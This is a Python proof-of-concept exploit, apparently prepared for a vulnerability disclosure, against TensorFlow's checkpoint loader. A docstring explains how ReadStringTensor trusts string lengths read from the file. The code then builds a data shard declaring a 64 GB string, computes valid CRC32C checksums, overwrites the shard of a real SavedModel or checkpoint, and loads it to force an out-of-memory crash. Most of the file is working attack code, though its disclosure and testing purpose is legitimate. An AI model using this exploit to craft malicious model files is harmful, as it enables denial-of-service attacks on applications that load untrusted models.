| |
| """ |
| PoC: TensorFlow Checkpoint String Tensor Unbounded Allocation DoS |
| ================================================================= |
| CVE: TBD |
| Target: tensorflow/core/util/tensor_bundle/tensor_bundle.cc |
| Trigger: tf.saved_model.load() or tf.train.load_checkpoint() |
| |
| Vulnerability: |
| ReadStringTensor() reads varint64 string_lengths from attacker-controlled |
| checkpoint data files. No validation that individual string_length values |
| or their sum are bounded by entry.size(). Attacker can craft a checkpoint |
| where a string tensor with shape [1] declares a single string of 64GB, |
| causing immediate OOM crash via tstring::resize(). |
| |
| CRC32 checksums are NOT a security boundary — the attacker controls both |
| the data file content AND the crc32c field in BundleEntryProto metadata. |
| |
| Root Cause: |
| tensor_bundle.cc:151-159 — ReadStringTensor() inner loop: |
| buffer->resize(string_length); // string_length from attacker varint64 |
| ReadNBytes(string_length, ...); // reads from file |
| |
| No check: sum(string_lengths[i]) <= entry.size() - overhead |
| No check: individual string_length <= entry.size() |
| |
| Impact: |
| - Process crash (OOM / std::terminate) on loading malicious SavedModel |
| - Denial of service for any application using tf.saved_model.load() |
| - No authentication required — victim just needs to load a model file |
| |
| Additionally affected: ReadVariantTensor() at line 188 (same pattern). |
| GetValue() has NO size validation at all for DT_VARIANT tensors (line 998). |
| """ |
|
|
| import os |
| import sys |
| import struct |
| import tempfile |
| import shutil |
|
|
def encode_varint64(value):
    """Encode a non-negative integer as a protobuf base-128 varint (uint64).

    The value is emitted least-significant 7-bit group first; every byte
    except the last has its high bit set as a continuation marker.

    Args:
        value: Integer in the range [0, 2**64 - 1].

    Returns:
        The varint encoding as ``bytes`` (1 to 10 bytes long).

    Raises:
        ValueError: If ``value`` is negative or does not fit in 64 bits.
            Such inputs previously produced a silently wrong encoding.
    """
    if not 0 <= value <= 0xFFFFFFFFFFFFFFFF:
        raise ValueError(f"varint64 value out of range: {value!r}")

    encoded = bytearray()
    while value > 0x7F:
        # Low 7 bits of payload plus the continuation flag.
        encoded.append((value & 0x7F) | 0x80)
        value >>= 7
    # Final group: continuation flag clear.
    encoded.append(value & 0x7F)
    return bytes(encoded)
|
|
def encode_fixed32(value):
    """Serialize the low 32 bits of ``value`` as four little-endian bytes."""
    low_word = value & 0xFFFFFFFF  # truncate to an unsigned 32-bit quantity
    packed = struct.pack('<I', low_word)
    return packed
|
|
def _build_crc32c_table():
    """Return the 256-entry byte lookup table for reflected CRC-32C."""
    reflected_poly = 0x82F63B78  # Castagnoli polynomial 0x1EDC6F41, bit-reversed
    table = []
    for byte in range(256):
        crc = byte
        for _ in range(8):
            crc = (crc >> 1) ^ reflected_poly if crc & 1 else crc >> 1
        table.append(crc)
    return tuple(table)


_CRC32C_TABLE = _build_crc32c_table()


def crc32c_value(data):
    """Compute the CRC-32C (Castagnoli) checksum of ``data``.

    Uses ``crcmod`` when it is importable; otherwise falls back to a
    table-driven pure-Python implementation of the same algorithm, so the
    result does not depend on which path is taken. (The earlier fallback
    used ``zlib.crc32``, which is the IEEE CRC-32 and yields different
    values.)

    Args:
        data: A bytes-like object.

    Returns:
        The checksum as an unsigned 32-bit integer.
    """
    try:
        import crcmod.predefined
    except ImportError:
        crc = 0xFFFFFFFF
        for byte in data:
            crc = _CRC32C_TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)
        return crc ^ 0xFFFFFFFF
    return crcmod.predefined.mkCrcFun('crc-32c')(data)
|
|
def crc32c_mask(crc):
    """Apply the CRC masking step: rotate right by 15 bits, then add a constant.

    The result is reduced to 32 bits.
    """
    mask_delta = 0xa282ead8
    rotated = (crc >> 15) | (crc << 17)
    masked = rotated + mask_delta
    return masked & 0xFFFFFFFF
|
|
def create_malicious_checkpoint_data():
    """Build the raw data-file bytes for a one-element DT_STRING tensor.

    Layout produced (string tensor data-file format):
        [varint64 string_length_0] ... [varint64 string_length_N-1]
        [uint32 length_checksum]
        [string_data_0] ... [string_data_N-1]

    A single length of 0x1000000000 (64GB) is declared, while only 16 bytes
    of string data actually follow it.

    Returns:
        A ``(data, overall_crc)`` tuple: the assembled bytes and the
        unmasked CRC32C computed over those bytes.
    """
    declared_length = 0x1000000000

    # Length section: the declared size as a varint64.
    varint_lengths = encode_varint64(declared_length)

    # The length checksum is taken over the length as a little-endian uint64
    # and then masked.
    # NOTE(review): presumably mirrors how the reader checksums lengths that
    # exceed 32 bits -- confirm against tensor_bundle.cc.
    lengths_crc = crc32c_value(struct.pack('<Q', declared_length))
    masked_lengths_crc = crc32c_mask(lengths_crc)

    # Only a token amount of string data is present.
    payload = b'\x00' * 16

    blob = b''.join((varint_lengths, encode_fixed32(masked_lengths_crc), payload))
    return blob, crc32c_value(blob)
|
|
def demo_vulnerability_analysis():
    """Print vulnerability analysis without requiring TensorFlow installed.

    Writes a fixed, human-readable report to stdout: the code excerpt under
    discussion, the attack scenario, the related variant-tensor path, and a
    summary of the bytes produced by create_malicious_checkpoint_data().
    Nothing is written to disk and nothing is returned.
    """
    # Report banner.
    print("=" * 72)
    print("TensorFlow Checkpoint String Tensor DoS — Vulnerability Analysis")
    print("=" * 72)
    print()
    # Section 1: excerpt of the C++ loop being discussed.
    print("VULNERABLE CODE: tensor_bundle.cc:151-159")
    print("-" * 50)
    print("""
for (size_t i = 0; i < num_elements; ++i) {
const uint64 string_length = string_lengths[i]; // FROM FILE
tstring* buffer = &destination[i];

buffer->resize(string_length); // <-- UNBOUNDED ALLOCATION
size_t bytes_read = 0;
TF_RETURN_IF_ERROR(
buffered_file->ReadNBytes(string_length, &(*buffer)[0], &bytes_read));
}
""")
    # Section 2: step-by-step description of the scenario.
    print("ATTACK SCENARIO:")
    print("-" * 50)
    print("""
1. Attacker crafts a SavedModel with a DT_STRING variable
2. In the checkpoint data file, the varint64 string_length = 64GB
3. CRC32C checksum in BundleEntryProto.crc32c is set correctly
(attacker controls both data and metadata — CRC is not a security check)
4. Victim loads model: tf.saved_model.load('malicious_model/')
5. BundleReader::Lookup() → GetValue() → ReadStringTensor()
6. tstring::resize(64GB) → std::bad_alloc → std::terminate() → CRASH
""")


    # Section 3: the variant-tensor reader with the same pattern.
    print("ALSO AFFECTED: ReadVariantTensor (tensor_bundle.cc:188)")
    print("-" * 50)
    print("""
string buffer;
buffer.resize(string_length); // <-- SAME UNBOUNDED ALLOCATION

GetValue() has NO size validation for DT_VARIANT (line 998-1009).
For DT_STRING, the "lower_bound" check is too weak:
lower_bound = NumElements (e.g., 1 for shape [1])
entry.size() just needs to be >= 1 — trivially satisfied.
""")


    # Section 4: build the sample data-file bytes and summarize them.
    print("MALICIOUS DATA FILE CONSTRUCTION:")
    print("-" * 50)
    data, crc = create_malicious_checkpoint_data()
    print(f" Data file size: {len(data)} bytes")
    print(f" Encoded varint64 string_length: 0x1000000000 (64 GB)")
    print(f" Overall CRC32C: 0x{crc:08X}")
    # Only the first 32 bytes are dumped.
    print(f" Data hex dump: {data[:32].hex()}")
    print()



    # Show the varint encoding of the same length value on its own.
    # The constant duplicates the one inside create_malicious_checkpoint_data().
    malicious_length = 0x1000000000
    varint = encode_varint64(malicious_length)
    print(f" Varint64 encoding of 64GB: {varint.hex()} ({len(varint)} bytes)")
    print()
|
|
def poc_with_tensorflow():
    """Save a SavedModel, overwrite its data shard, and try to load it.

    Steps:
      1. Save a small ``tf.Module`` holding one string variable into a
         temporary directory.
      2. Overwrite the first ``variables.data*`` shard (in sorted order) with
         the bytes from create_malicious_checkpoint_data().
      3. Call ``tf.saved_model.load()`` on the directory and report the result.

    The temporary directory is removed on the way out. If the load brings
    down the whole process, that cleanup does not run.

    Returns:
        False if TensorFlow cannot be imported (the analysis report is
        printed instead) or if no data shard is found; True once the load
        attempt has been made, whatever its outcome.
    """
    try:
        import tensorflow as tf
    except ImportError:
        print("[!] TensorFlow not installed. Running analysis-only mode.")
        demo_vulnerability_analysis()
        return False

    print("[*] TensorFlow version:", tf.__version__)
    print("[*] Creating legitimate SavedModel with string variable...")

    tmpdir = tempfile.mkdtemp(prefix="tf_poc_")
    model_dir = os.path.join(tmpdir, "saved_model")

    try:
        class SimpleModule(tf.Module):
            def __init__(self):
                # Let tf.Module set up its own state before adding variables.
                super().__init__()
                self.v = tf.Variable(["hello"], dtype=tf.string, name="str_var")

            @tf.function(input_signature=[])
            def get_value(self):
                return self.v

        module = SimpleModule()
        tf.saved_model.save(module, model_dir)
        print(f"[+] Saved legitimate model to: {model_dir}")

        var_dir = os.path.join(model_dir, "variables")
        # os.listdir() order is arbitrary; sort so the chosen shard is stable.
        data_files = sorted(
            f for f in os.listdir(var_dir) if f.startswith("variables.data")
        )

        if not data_files:
            print("[-] No data files found!")
            return False

        data_path = os.path.join(var_dir, data_files[0])
        print(f"[*] Data file: {data_path}")
        print(f"[*] Original data file size: {os.path.getsize(data_path)} bytes")

        # Only the data shard is replaced; the overall CRC returned alongside
        # the bytes is not used here.
        malicious_data, _ = create_malicious_checkpoint_data()

        with open(data_path, 'wb') as f:
            f.write(malicious_data)
        print(f"[*] Wrote malicious data file ({len(malicious_data)} bytes)")
        print("[*] Malicious string_length = 64 GB (0x1000000000)")

        print()
        print("[!] Attempting to load malicious model...")
        print("[!] Expected: OOM crash or std::terminate")
        print()

        try:
            tf.saved_model.load(model_dir)
            print("[-] Load succeeded unexpectedly")
        except Exception as e:
            # Deliberately broad: this is the reporting boundary of the demo
            # and any Python-level error raised by the loader is of interest.
            print(f"[+] Exception caught: {type(e).__name__}: {e}")

        return True

    finally:
        shutil.rmtree(tmpdir, ignore_errors=True)
|
|
def poc_direct_checkpoint():
    """Save a checkpoint, overwrite its data shard, and try to restore it.

    Alternative to the SavedModel flow: a ``tf.train.Checkpoint`` holding one
    string variable is saved into a temporary directory, the first
    ``*.data-*`` shard (in sorted order) is overwritten with the bytes from
    create_malicious_checkpoint_data(), and the checkpoint is restored into a
    fresh variable.

    The temporary directory is removed on the way out. If the restore brings
    down the whole process, that cleanup does not run.

    Returns:
        False if TensorFlow cannot be imported (the analysis report is
        printed instead) or if no data shard is found; True once the restore
        attempt has been made, whatever its outcome.
    """
    try:
        import tensorflow as tf
    except ImportError:
        print("[!] TensorFlow not installed. Running analysis-only mode.")
        demo_vulnerability_analysis()
        return False

    print("[*] TensorFlow version:", tf.__version__)
    print("[*] Creating checkpoint with string variable...")

    tmpdir = tempfile.mkdtemp(prefix="tf_ckpt_poc_")
    ckpt_prefix = os.path.join(tmpdir, "malicious_ckpt")

    try:
        v = tf.Variable(["test_string"], dtype=tf.string, name="vuln_var")
        ckpt = tf.train.Checkpoint(var=v)
        save_path = ckpt.save(ckpt_prefix)
        print(f"[+] Saved checkpoint: {save_path}")

        # os.listdir() order is arbitrary; sort so the chosen shard is stable.
        data_files = sorted(f for f in os.listdir(tmpdir) if '.data-' in f)
        if not data_files:
            print("[-] No data files found!")
            return False

        data_path = os.path.join(tmpdir, data_files[0])

        # Only the data shard is replaced; the overall CRC returned alongside
        # the bytes is not used here.
        malicious_data, _ = create_malicious_checkpoint_data()
        with open(data_path, 'wb') as f:
            f.write(malicious_data)

        print("[*] Patched data file with 64GB string_length")
        print("[!] Loading malicious checkpoint...")

        try:
            v2 = tf.Variable([""], dtype=tf.string, name="vuln_var")
            ckpt2 = tf.train.Checkpoint(var=v2)
            ckpt2.restore(save_path)
            print(f"[-] Restore succeeded unexpectedly. Value: {v2.numpy()}")
        except Exception as e:
            # Deliberately broad: this is the reporting boundary of the demo
            # and any Python-level error raised by the restore is of interest.
            print(f"[+] Exception: {type(e).__name__}: {e}")

        return True
    finally:
        shutil.rmtree(tmpdir, ignore_errors=True)
|
|
if __name__ == "__main__":
    # Command-line entry point.
    #   --analysis    print the written analysis only
    #   --checkpoint  run the tf.train.Checkpoint variant
    #   (default)     run the SavedModel variant
    print("TensorFlow Checkpoint String Tensor DoS PoC")
    print("=" * 50)
    print()

    if "--analysis" in sys.argv:
        demo_vulnerability_analysis()
    elif "--checkpoint" in sys.argv:
        poc_direct_checkpoint()
    else:
        # poc_with_tensorflow() prints the analysis itself when TensorFlow
        # cannot be imported, so no additional fallback call is made here;
        # calling demo_vulnerability_analysis() again on a False return
        # printed the whole report twice.
        poc_with_tensorflow()
|
|